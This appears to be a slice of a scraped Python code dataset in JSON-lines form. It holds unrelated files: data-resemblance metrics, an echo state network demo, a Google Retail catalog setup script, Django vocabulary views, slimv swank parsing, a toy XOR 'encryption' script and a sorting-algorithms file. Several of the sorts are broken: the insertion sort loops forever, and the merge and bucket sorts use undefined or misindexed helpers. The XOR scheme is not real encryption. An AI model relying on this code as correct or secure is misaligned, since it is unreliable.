probability')\nplt.ylabel('Data/MC')\nplt.xlim(0,1)\nplt.ylim(0,2)\nax2.xaxis.set_major_locator(ticker.MultipleLocator(0.2))\nax2.xaxis.set_minor_locator(ticker.MultipleLocator(0.02))\nax2.yaxis.set_major_locator(ticker.MultipleLocator(1.))\nax2.yaxis.set_minor_locator(ticker.MultipleLocator(0.2))\nplt.savefig(fig_dir+'hist1d_mirco_dataMC_comparison_E'+str(expo)+'.png',bbox_inches='tight',dpi=300)\nplt.savefig(fig_dir+'hist1d_mirco_dataMC_comparison_E'+str(expo)+'.pdf',bbox_inches='tight')\nplt.close()\n","sub_path":"5-3_check_mirco.py","file_name":"5-3_check_mirco.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"23011518","text":"#import libraries\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom pandas.plotting import scatter_matrix\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.manifold import Isomap\n\n\ndef preprocess_data(data) :\n\n \"\"\"Preprocess the given dataset applying One-Hot encoding of categorical attributes and Standardization for numerical attributes.\n \n Parameters\n ----------\n data : pandas.core.frame.DataFrame\n The dataframe to be preprocessed\n\n Returns\n -------\n numpy.ndarray\n a matrix with the preprocessed data\n \"\"\"\n\n #get categorical attributes\n categorical_vars = data.select_dtypes(include=['category'])\n\n #label encoder each categorical attribute\n for c in categorical_vars.columns.tolist() :\n categorical_vars[c] = LabelEncoder().fit_transform(categorical_vars[c])\n\n #one-hot encode categorical variables\n onehot_encoder_x = OneHotEncoder()\n x_cat = onehot_encoder_x.fit_transform(categorical_vars).toarray()\n\n #standardize numerical variables\n numerical_vars = data.select_dtypes(include=['int64','float64'])\n x_num = StandardScaler().fit_transform(numerical_vars)\n\n #return the standardized numerical attributes stacked with the one-hot encoded categorical attributes\n return np.column_stack((x_num, x_cat))\n\n\ndef pca_transform(data_scaled, labels) :\n\n \"\"\"Compute the PCA transform from a scaled data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #compute the PCA transform\n pca_transform = PCA(n_components=2).fit_transform(data_scaled)\n\n #append labels to the transformed data\n pca = np.append(pca_transform, labels, axis=1)\n\n #return a dataframe with the transformed data\n return pd.DataFrame(data=pca, columns=['PC1','PC2','Label'])\n\n\ndef isomap_transform(data_scaled, labels) :\n\n \"\"\"Compute the Isomap transform from a scaled data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #compute the Isomap transform\n iso_transform = Isomap(n_components=2).fit_transform(data_scaled)\n\n #append labels to the transformed data\n iso = np.append(iso_transform, labels, axis=1)\n\n #return a dataframe with the transformed data\n return pd.DataFrame(data=iso, columns=['PC1','PC2','Label'])\n\n\ndef batch(iterable, n=1) :\n\n \"\"\"Create iterable batches from a dataframe.\n \n Parameters\n ----------\n iterable : numpy.ndarray\n A matrix to be divided in batches\n\n n : int\n Length of the batches to create\n \"\"\"\n\n #get length of the matrix to divide in batches\n l = len(iterable)\n\n #loop to divide the data into batches of length n\n for ndx in range(0, l, n):\n yield iterable[ndx:min(ndx + n, l)]\n\n\ndef isomap_transform_on_batch(data_scaled, labels) :\n\n \"\"\"Compute the Isomap transform on batch from a scaled data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #initialize dataframe to save the values of the transformation\n iso_df = pd.DataFrame(columns=['PC1','PC2','Label'])\n \n #loop to iterate over all batches of data\n for (b, y) in zip(batch(data_scaled,10000),batch(labels,10000)) :\n\n #transform the batch of data\n iso_transform = Isomap(n_components=2).fit_transform(b)\n\n #append the labels of the data\n iso = np.append(iso_transform, y, axis=1)\n\n #append the transformation of the actual batch to the dataframe that contains the transformation of all the batches\n iso = pd.DataFrame(data=iso, columns=['PC1','PC2','Label'])\n iso_df = iso_df.append(iso, ignore_index=True)\n\n #return a dataframe with the transformed data\n return iso_df\n\n\ndef dra_distance(real,synthetic) :\n\n \"\"\"Compute the proposed DRA distance, which is a distance metric that indicates the distance between two dimensionality dimension plots. The metric is the joint distance between the baricenters distance and spread distance.\n \n Parameters\n ----------\n real : pandas.core.frame.DataFrame\n A dataframe with the dimensionality results (PCA or ISOMAP) of the real data.\n \n synthetic: pandas.core.frame.DataFrame\n A dataframe with the dimensionality results (PCA or ISOMAP) of the synthetic data.\n\n Returns\n -------\n numpy.float64\n the computed DRA distance metric.\n \"\"\"\n \n #compute baricenters distance\n bc_real=np.mean(real[['PC1','PC2']].values)\n bc_synth=np.mean(synthetic[['PC1','PC2']].values)\n dist_real_synth = np.linalg.norm(bc_real - bc_synth)\n \n #compute spread distance\n spread_real=np.std(real[['PC1','PC2']].values)\n spread_synth=np.std(synthetic[['PC1','PC2']].values)\n dist_spread_real_synth = np.abs(spread_real-spread_synth)\n \n #compute joint distance\n alpha=0.05\n return np.round(alpha*dist_real_synth + (1-alpha)*dist_spread_real_synth,4)\n\n","sub_path":"EVALUATION FUNCTIONS/RESEMBLANCE/dimensional_resemblance.py","file_name":"dimensional_resemblance.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249362903","text":"import torch.nn\nimport numpy as np\nimport sys\nsys.path.append('../')\nimport DataLoad\n\nfrom torchesn.nn import ESN\nfrom torchesn import utils\nimport time\n\ndevice = torch.device('cuda')\ndtype = torch.double\ntorch.set_default_dtype(dtype)\ndataset='Mackey_glass'\n[X_data,Y_data]=DataLoad.FilesLoad(dataset)\n\nX_data = torch.from_numpy(X_data).to(device)\nY_data = torch.from_numpy(Y_data).to(device)\n\ntrX = X_data[:5000]\ntrY = Y_data[:5000]\ntsX = X_data[5000:]\ntsY = Y_data[5000:]\n\nwashout = [500]\ninput_size = output_size = 1\nhidden_size = 500\nloss_fcn = torch.nn.MSELoss()\n\nif __name__ == \"__main__\":\n start = time.time()\n\n # Training\n trY_flat = utils.prepare_target(trY.clone(), [trX.size(0)], washout)\n\n model = ESN(input_size, hidden_size, output_size)\n model.to(device)\n\n model(trX, washout, None, trY_flat)\n model.fit()\n output, hidden = model(trX, washout)\n print(\"Training error:\", loss_fcn(output, trY[washout[0]:]).item())\n\n # Test\n output, hidden = model(tsX, [0], hidden)\n print(\"Test error:\", loss_fcn(output, tsY).item())\n print(\"Ended in\", time.time() - start, \"seconds.\")","sub_path":"examples/mackey-glass.py","file_name":"mackey-glass.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127172963","text":"import binascii\n\n\ndef encfunction(text):\n enclist = [b^11 for b in text]\n return enclist\ndef decfunction(text):\n declist = [b^11 for b in text]\n return declist\n\n\nwhile(True):\n word = input(\"enter a message: \\n\")\n action = input(\"enter 'e' to encrypt, 'd' to decrypt:\\n \")\n if action == 'e':\n print(\"Encrypting...\")\n utf8 = binascii.hexlify(word.encode(\"utf8\"))\n print(bytes(encfunction(utf8))) # הופך רשימה של אינטים חזרה לבייטים\n\n elif action == 'd':\n word = bytes(word, 'utf-8')\n print(\"Decrypting...\")\n utf8 = decfunction(word)\n print(binascii.unhexlify(utf8).decode(\"utf8\"))\n print(bytes(encfunction(utf8)))\n print(type(word))\n else:\n print(\"try again\")\n","sub_path":"Project/testencryption3.py","file_name":"testencryption3.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"307380581","text":"import random\nimport random\nimport string\nimport time\n\nfrom google.api_core.client_options import ClientOptions\nfrom google.cloud.retail_v2 import SearchServiceClient, Product, PriceInfo, ColorInfo, \\\n ProductServiceClient, CreateProductRequest, DeleteProductRequest, CustomAttribute, FulfillmentInfo\nfrom google.protobuf.field_mask_pb2 import FieldMask\n\nproject_number = \"SET HERE VALID PROJECT NUMBER\"\nendpoint = \"retail.googleapis.com\"\nisolation_filter_key = \"INTEGRATION_FILTER_KEY\"\ntitle_query = \"Nest_Maxi\"\nvisitor_id = \"visitor\"\ntest_id = ''.join(random.sample(string.ascii_lowercase, 1))\n\n# [START search_client]\ndefault_catalog = \"projects/{0}/locations/global/catalogs/default_catalog/branches/0\".format(project_number)\ndefault_search_placement = \"projects\" + project_number + \"locations/global/catalogs/default_catalog/placements/default_search\"\ncreated_products = []\n\n\ndef get_search_service_client():\n client_options = ClientOptions(endpoint)\n return SearchServiceClient(client_options=client_options)\n\n\n# [END search_client]\n\n# [START ingesting products for search]\ndef get_product_service_client():\n client_options = ClientOptions(endpoint)\n return ProductServiceClient(client_options=client_options)\n\n\ndef get_primary_products():\n products = []\n product1 = Product()\n product2 = Product()\n\n price_info1 = PriceInfo()\n price_info1.price = 20.0\n price_info1.original_price = 25.0\n price_info1.cost = 10.0\n price_info1.currency_code = \"USD\"\n\n color_info1 = ColorInfo()\n color_info1.color_families = [\"black\"]\n color_info1.colors = [\"carbon\"]\n\n fulfillment_info1 = FulfillmentInfo()\n fulfillment_info1.type_ = \"pickup-in-store\"\n fulfillment_info1.place_ids = [\"store1\", \"store2\"]\n\n field_mask1 = FieldMask(paths=[\"title\", \"categories\", \"price_info\", \"color_info\"])\n\n product1.title = \"Nest_Maxi\"\n product1.categories = [\"Nest > speakers and displays\"]\n product1.uri = \"https://uri.com\"\n product1.brands = [\"Google\"]\n product1.price_info = price_info1\n product1.color_info = color_info1\n product1.fulfillment_info = [fulfillment_info1]\n product1.retrievable_fields = field_mask1\n\n price_info2 = PriceInfo()\n price_info2.price = 15.0\n price_info2.original_price = 20.0\n price_info2.cost = 5.0\n price_info2.currency_code = \"USD\"\n\n color_info2 = ColorInfo()\n color_info2.color_families = [\"blue\"]\n color_info2.colors = [\"sky\"]\n\n fulfillment_info2 = FulfillmentInfo()\n fulfillment_info2.type_ = \"pickup-in-store\"\n fulfillment_info2.place_ids = [\"store2\", \"store3\"]\n\n field_mask2 = FieldMask(paths=[\"title\", \"categories\", \"price_info\", \"color_info\"])\n\n product2.title = \"Nest_Maxi\"\n product2.categories = [\"Nest > speakers and displays\"]\n product2.uri = \"https://uri.com\"\n product2.brands = [\"Google\"]\n product2.price_info = price_info2\n product2.color_info = color_info2\n product2.fulfillment_info = [fulfillment_info2]\n product2.retrievable_fields = field_mask2\n\n products.append(product1)\n products.append(product2)\n return products\n\n\ndef get_variant():\n variant = Product()\n\n fulfillment_info = FulfillmentInfo()\n fulfillment_info.type_ = \"ship-to-store\"\n fulfillment_info.place_ids = [\"store123\"]\n\n variant.type_ = Product.Type.VARIANT\n variant.title = \"Nest_Maxi_variant1\"\n variant.uri = \"https://uri.com\"\n variant.fulfillment_info = [fulfillment_info]\n\n return variant\n\n\ndef create_product_for_search(products: [Product], test__id: str):\n for product in products:\n attribute = CustomAttribute()\n attribute.text = test__id\n attribute.indexable = True\n isolation_filter = {isolation_filter_key: attribute}\n product.attributes = isolation_filter\n product_client = get_product_service_client()\n create_request = CreateProductRequest()\n create_request.product = product\n create_request.parent = default_catalog\n create_request.product_id = '{0}_{1}'.format(product.title, get_random_id())\n created_product = product_client.create_product(request=create_request)\n print(create_request)\n variant = get_variant()\n variant.primary_product_id = created_product.id\n create_request.product = variant\n create_request.product_id = '{0}_{1}'.format(variant.title, get_random_id())\n created_variant = product_client.create_product(request=create_request)\n print(create_request)\n created_products.append(created_product)\n created_products.append(created_variant)\n\n return created_products\n\n\ndef delete_ingested_products(products: [Product]):\n product_client = get_product_service_client()\n types = [Product.Type.VARIANT, Product.Type.PRIMARY]\n for _type in types:\n for product in products:\n if product.type_.__eq__(_type):\n delete_request = DeleteProductRequest()\n delete_request.name = product.name\n product_client.delete_product(request=delete_request)\n\n\ndef get_random_id():\n return ''.join(random.sample(string.ascii_lowercase, 10))\n\n\ndef build_isolation_filter(test__id: str):\n return 'attributes.{0}: ANY(\"{1}\")'.format(isolation_filter_key, test__id)\n\n\n# [END ingesting products for search]\n\n\ndef ingest_products(test__id: str):\n print(\"---ingesting products to catalog---\")\n create_product_for_search(get_primary_products(), test__id)\n print(\"---wait for ingested products to be indexed in catalog---\")\n time.sleep(10)\n\n\ndef delete_products():\n print(\"---removing ingested products---\")\n delete_ingested_products(created_products)\n print(\"---products removed---\")\n","sub_path":"setup_catalog.py","file_name":"setup_catalog.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646032926","text":"def SelectionSort(nums:list):\n n = len(nums)\n for i in range(n):\n for j in range(i,n):\n if(nums[i] > nums[j]):\n nums[i],nums[j] = nums[j],nums[i]\n return nums\n\n#O(n^2) 不稳定内排序\n\ndef bubbleSort(nums:list):\n n = len(nums)\n for c in range(n):\n for i in range(1,n-c):\n if(nums[i-1] > nums[i]):\n nums[i],nums[i-1] = nums[i-1],nums[i]\n return nums\n\n#O(n^2) 稳定内排序\n\ndef insertSort(nums:list):\n n = len(nums)\n for i in range(1,n):\n while(i>0 and nums[i-1] > nums[i]):\n nums[i-1],nums[i] = nums[i],nums[i-1]\n return nums\n\n#O(n^2) 稳定内排序\n\ndef shellSort(nums:list):\n n = len(nums)\n gap = n // 2\n while gap:\n for i in range(gap,n):\n while (i-gap >= 0 and nums[i-gap] > nums[i]):\n nums[i-gap],nums[i] = nums[i],nums[i-gap]\n i -= gap\n gap //= 2\n return nums\n\n#下界是n*log2n 中等规模表现较好 在最坏的情况下和平均情况下执行效率相差不是很多\n# 平均O(nlogn) 最坏O(n^2) 非稳定内排序\n\ndef MergeSort(nums:list):\n if len(nums) <= 1:\n return nums\n mid = len(nums) // 2\n left = MergeSort(nums[:mid])\n right = MergeSort(nums[mid:])\n return merge(left,right)\n\n def merge(left,right):\n res = []\n i = 0\n j = 0\n while(i < len(left) and j < len(right)):\n if left[i] <= right[i]:\n res.append(left[i])\n i += 1\n else:\n res.append(right[i])\n j += 1\n res += left[i:]\n res += right[j:]\n return res\n\n# O(nlogn) 稳定外排序\n\ndef quickSort(nums:list):\n n = len(nums)\n\n def quick(left,right):\n if left >= right:\n return nums\n pivot = left\n i = left\n j = right\n while(i < j):\n while(i < j and nums[j] > nums[pivot]):\n j -= 1\n while(i < j and nums[i] <= nums[pivot]):\n i += 1\n nums[i],nums[j] = nums[j],nums[i]\n nums[pivot],nums[j] = nums[j],nums[pivot]\n quick(left,j-1)\n quick(j+1,right)\n return nums\n\n return quick(0,n-1)\n\n#不稳定内排序,时间复杂度度O(nlogn)\n\ndef heapSort(nums:list):\n n = len(nums)\n\n def adjust_heap_recur(nums, startpos, endpos):\n pos = startpos\n childpos = pos * 2 +1\n if childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and nums[rightpos] > nums[childpos]:\n childpos = rightpos\n if nums[childpos] > nums[pos]:\n nums[pos],nums[childpos] = nums[childpos],nums[pos]\n adjust_heap_recur(nums,pos,endpos)\n\n def adjust_heap_norecur(nums, startpos, endpos):\n newitem = nums[startpos]\n pos = startpos\n childpos = pos * 2 + 1\n while childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and nums[rightpos] >= nums[childpos]:\n childpos = rightpos\n if newitem < nums[childpos]:\n nums[pos] = nums[childpos]\n pos = childpos\n childpos = pos * 2 + 1\n else:\n break\n nums[pos] = newitem\n\n#创建堆\n for i in reversed(range(n//2)):\n adjust_heap_recur(nums,i,n)\n#调整堆\n for i in range(n-1,-1,-1):\n nums[0],nums[i] = nums[i],nums[0]\n adjust_heap_recur(nums,0,i)\n return nums\n\n#不稳定排序,内排序,时间复杂度为O(nlogn)\n\ndef countSort(nums:list):\n if not nums: return[]\n n = len(nums)\n _min = min(nums)\n _max = max(nums)\n tmp_arr = [0] * (_max - _min + 1)\n for num in nums:\n tmp_arr[num - _min] += 1\n j = 0\n for i in range(n):\n while tmp_arr[j] == 0:\n j += 1\n nums[i] = j + _min\n tmp_arr[j] -= 1\n return nums\n\n# 稳定外排序,时间复杂度O(n+k),\n# 但是对于数据范围很大的数组,需要大量时间和内存。\n# 典型以空间换时间的算法\n\ndef bucketSort(nums:list,bucketSize:int):\n if len(nums) < 2:\n return nums\n _min = min(nums)\n _max = max(nums)\n # 需要桶个数\n bucketNum = (_max - _min) // bucketSize + 1\n buckets = [[] for _ in range(bucketNum)]\n for num in nums:\n # 放入相应的桶中\n buckets[(num - _min) // bucketSize].append(num)\n res = []\n\n for bucket in buckets:\n if not bucket: continue\n if bucketSize == 1:\n res.extend(bucket)\n else:\n # 当都装在一个桶里,说明桶容量大了\n if bucketNum == 1:\n bucketSize -= 1\n res.extend(bucket_sort(bucket, bucketSize))\n return res\n\n#稳定外排序,时间复杂度O(n+k),k为桶的个数\n\ndef Radix_sort(nums):\n if not nums: return []\n _max = max(nums)\n # 最大位数\n maxDigit = len(str(_max))\n bucketList = [[] for _ in range(10)]\n # 从低位开始排序\n div, mod = 1, 10\n for i in range(maxDigit):\n for num in nums:\n bucketList[num % mod // div].append(num)\n div *= 10\n mod *= 10\n idx = 0\n for j in range(10):\n for item in bucketList[j]:\n nums[idx] = item\n idx += 1\n bucketList[j] = []\n return nums\n\n# 稳定外排序,时间复杂度 posCount∗(n+n)\n# 其中 posCount 为数组中最大元素的最高位数\n# 简化下得:O(k*n);其中k为常数,n为元素个数。\n\n\n# nums = [4,3,2,6,5,6,2,7,5,8,4]\n\n# print(quickSort(nums))","sub_path":"TenSort.py","file_name":"TenSort.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268899092","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom deutschlernen.vocabulary.models import Vocabulary\nfrom deutschlernen.vocabulary.forms import VocabularyAddForm\n\n@login_required\ndef index(request):\n #output = {}\n #output['menutop'] = \"vocabulary\"\n #return render_to_response('vocabulary/index.html', output, context_instance=RequestContext(request));\n \n return HttpResponseRedirect('/vocabulary/list/')\n\n\n@login_required\ndef add(request):\n output = {}\n\n if request.method == 'POST':\n form = VocabularyAddForm(request.POST)\n if form.is_valid():\n article = form.cleaned_data['article']\n word = form.cleaned_data['word']\n translation = form.cleaned_data['translation']\n category = form.cleaned_data['category']\n\n vocabulary, created = Vocabulary.objects.get_or_create(word=word, defaults = { 'article': article, 'translation': translation, 'category': category })\n\n if created is False:\n messages.error(request, _('Can\\'t add this word, it already exists in the database'))\n\n else:\n messages.success(request, _('A word \\'%(article)s %(word)s\\' has been added correctly') % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word })\n\n else:\n form = VocabularyAddForm()\n \n output['form'] = form\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"add\"\n return render_to_response('vocabulary/add_edit.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef article(request, id=None):\n output = {}\n\n if id is None:\n vocabulary = Vocabulary.objects.all().order_by('?')[0]\n else:\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n article = request.POST.get('article', '')\n\n if article == vocabulary.get_article_display():\n messages.success(request, _(\"Correct! %(article)s %(word)s\") % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word })\n output['result'] = \"OK\"\n else:\n messages.error(request, _(\"Bad response! Try once more.\"))\n output['result'] = \"ERROR\"\n\n output['vocabulary'] = vocabulary\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"article\"\n return render_to_response('vocabulary/article.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef translations(request, id=None):\n output = {}\n\n if id is None:\n vocabulary = Vocabulary.objects.all().order_by('?')[0]\n else:\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n translation = request.POST.get('translation', '')\n\n if translation == vocabulary.translation:\n messages.success(request, _(\"Success! The correct translation of \\'%(article)s %(word)s\\' is \\'%(translation)s\\'\") % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word, 'translation': translation })\n output['result'] = \"OK\"\n else:\n messages.error(request, _(\"Bad response! Try once more.\"))\n output['result'] = \"ERROR\"\n\n output['vocabulary'] = vocabulary\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"translations\"\n return render_to_response('vocabulary/translations.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef list(request):\n output = {}\n\n vocabularies = Vocabulary.objects.all().order_by(\"word\")\n\n paginator = Paginator(vocabularies, settings.RESULTS_PER_PAGE)\n\n page = request.GET.get('page')\n\n try:\n vocabularies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n vocabularies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n vocabularies = paginator.page(paginator.num_pages)\n\n output['objects_list'] = vocabularies\n output['paginator'] = paginator\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"list\"\n return render_to_response('vocabulary/list.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef edit(request, id):\n output = {}\n\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n form = VocabularyAddForm(request.POST)\n if form.is_valid():\n article = form.cleaned_data['article']\n word = form.cleaned_data['word']\n translation = form.cleaned_data['translation']\n category = form.cleaned_data['category']\n\n vocabulary.article = article\n vocabulary.word = word\n vocabulary.translation = translation\n vocabulary.category = category\n vocabulary.save()\n\n messages.success(request, _('A word has been edited correctly'))\n\n return HttpResponseRedirect('/vocabulary/list/')\n else:\n form = VocabularyAddForm(initial={ 'word': vocabulary.word, 'article': vocabulary.article, 'translation': vocabulary.translation, 'category': vocabulary.category })\n \n output['form'] = form\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"list\"\n output['edit'] = True\n return render_to_response('vocabulary/add_edit.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef delete(request, id):\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n vocabulary.delete()\n\n messages.success(request, _('A word has been removed correctly'))\n return HttpResponseRedirect('/vocabulary/list/')\n\n\n@login_required\ndef opposites(request):\n output = {}\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"opposites\"\n return render_to_response('vocabulary/opposites.html', output, context_instance=RequestContext(request));\n\n","sub_path":"deutschlernen/vocabulary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"147501533","text":"import vim\n\nfrom utils import logtime, logprint, unicode_len, unquote, parse_filepos, format_filename \n###############################################################################\n# Swank server interface\n###############################################################################\n\ndef swank_parse_inspect_content(pcont):\n \"\"\"\n Parse the swank inspector content\n \"\"\"\n global inspect_lines\n global inspect_newline\n\n if type(pcont[0]) != list:\n return\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n help_lines = int( vim.eval('exists(\"b:help_shown\") ? len(b:help) : 1') )\n pos = help_lines + inspect_lines\n buf[pos:] = []\n istate = pcont[1]\n start = pcont[2]\n end = pcont[3]\n lst = []\n for el in pcont[0]:\n # logprint(str(el))\n newline = False\n if type(el) == list:\n if el[0] == ':action':\n text = '{<' + unquote(el[2]) + '> ' + unquote(el[1]) + ' <>}'\n else:\n text = '{[' + unquote(el[2]) + '] ' + unquote(el[1]) + ' []}'\n lst.append(text)\n else:\n text = unquote(el)\n lst.append(text)\n if text == \"\\n\":\n newline = True\n lines = \"\".join(lst).split(\"\\n\")\n if inspect_newline or pos > len(buf):\n buf.append(lines)\n else:\n buf[pos-1] = buf[pos-1] + lines[0]\n buf.append(lines[1:])\n inspect_lines = len(buf) - help_lines\n inspect_newline = newline\n if int(istate) > int(end):\n # Swank returns end+1000 if there are more entries to request\n buf.append(['', \"[--more--]\", \"[--all---]\"])\n inspect_path = vim.eval('s:ctx.inspect_path')\n if len(inspect_path) > 1:\n buf.append(['', '[<<] Return to ' + ' -> '.join(inspect_path[:-1])])\n else:\n buf.append(['', '[<<] Exit Inspector'])\n if int(istate) > int(end):\n # There are more entries to request\n # Save current range for the next request\n vim.command(\"let b:range_start=\" + start)\n vim.command(\"let b:range_end=\" + end)\n vim.command(\"let b:inspect_more=\" + end)\n else:\n # No ore entries left\n vim.command(\"let b:inspect_more=0\")\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_inspect(struct):\n \"\"\"\n Parse the swank inspector output\n \"\"\"\n global inspect_lines\n global inspect_newline\n\n vim.command('call slimv#inspect#open()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n title = parse_plist(struct, ':title')\n vim.command('let b:inspect_title=\"' + title + '\"')\n buf[:] = ['Inspecting ' + title, '--------------------', '']\n vim.command('normal! 3G0')\n vim.command('call slimv#buffer#help(2)')\n pcont = parse_plist(struct, ':content')\n inspect_lines = 3\n inspect_newline = True\n swank_parse_inspect_content(pcont)\n vim.command('call slimv#inspect#setPos(\"' + title + '\")')\n\ndef swank_parse_debug(struct):\n \"\"\"\n Parse the SLDB output\n \"\"\"\n vim.command('call slimv#debug#openSldb()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n [thread, level, condition, restarts, frames, conts] = struct[1:7]\n buf[:] = [l for l in (unquote(condition[0]) + \"\\n\" + unquote(condition[1])).splitlines()]\n buf.append(['', 'Restarts:'])\n for i in range( len(restarts) ):\n r0 = unquote( restarts[i][0] )\n r1 = unquote( restarts[i][1] )\n r1 = r1.replace(\"\\n\", \" \")\n buf.append([str(i).rjust(3) + ': [' + r0 + '] ' + r1])\n buf.append(['', 'Backtrace:'])\n for f in frames:\n frame = str(f[0])\n ftext = unquote( f[1] )\n ftext = ftext.replace('\\n', '')\n ftext = ftext.replace('\\\\\\\\n', '')\n buf.append([frame.rjust(3) + ': ' + ftext])\n vim.command('call slimv#endUpdate()')\n vim.command(\"call search('^Restarts:', 'w')\")\n vim.command('stopinsert')\n # This text will be printed into the REPL buffer\n return unquote(condition[0]) + \"\\n\" + unquote(condition[1]) + \"\\n\"\n\ndef swank_parse_xref(struct):\n \"\"\"\n Parse the swank xref output\n \"\"\"\n buf = ''\n for e in struct:\n buf = buf + unquote(e[0]) + ' - ' + parse_location(e[1]) + '\\n'\n return buf\n\n\ndef swank_parse_list_breakpoints(tl):\n vim.command('call slimv#buffer#open(\"BREAKPOINTS\")')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n buf[:] = ['Breakpoints', '--------------------']\n # vim.command('call slimv#buffer#help(2)')\n buf.append(['', 'Idx ID File Line Enbled?', \\\n '---- --- ---------------------------- ----- -------'])\n vim.command('normal! G0')\n lst = tl[1]\n headers = lst.pop(0)\n # logprint(str(lst))\n idx = 0\n for t in lst:\n # t is a tuple of: \n # ((:id :file :line :enabled)\n state = unquote(t[2])\n name = unquote(t[1])\n buf.append([\"%3d: %3s %20s %6s %s\" % (idx, t[0], t[1], t[2], t[3])])\n idx = idx + 1\n vim.command('normal! j')\n vim.command('call slimv#endUpdate()')\n\n\ndef swank_parse_list_threads(swank, tl):\n vim.command('call slimv#thread#open()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n buf[:] = ['Threads in pid '+swank.pid, '--------------------']\n vim.command('call slimv#buffer#help(2)')\n buf.append(['', 'Idx ID Status Name Priority', \\\n '---- ------ ------------ ---------------------------- ---------'])\n vim.command('normal! G0')\n lst = tl[1]\n headers = lst.pop(0)\n # logprint(str(lst))\n idx = 0\n for t in lst:\n priority = ''\n if len(t) > 3:\n priority = unquote(t[3])\n\n # t is a tuple of: \n # (:id :name :state :at-breakpoint? :suspended? :suspends) \n try:\n id = \"%5d\" % int(t[0])\n except ValueError:\n id = \" \"*5 \n\n state = unquote(t[2])\n name = unquote(t[1])\n buf.append([\"%3d: %s %-15s %-29s %s\" % (idx, id, state, name, priority)])\n idx = idx + 1\n vim.command('normal! j')\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_frame_call(struct, action):\n \"\"\"\n Parse frame call output\n \"\"\"\n vim.command('call slimv#gotoFrame(' + action.data + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n if type(struct) == list:\n buf[line:line] = [struct[1][1]]\n else:\n buf[line:line] = ['No frame call information']\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_frame_source(struct, action):\n \"\"\"\n Parse frame source output\n http://comments.gmane.org/gmane.lisp.slime.devel/9961 ;-(\n 'Well, let's say a missing feature: source locations are currently not available for code loaded as source.'\n \"\"\"\n vim.command('call slimv#gotoFrame(' + action.data + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n 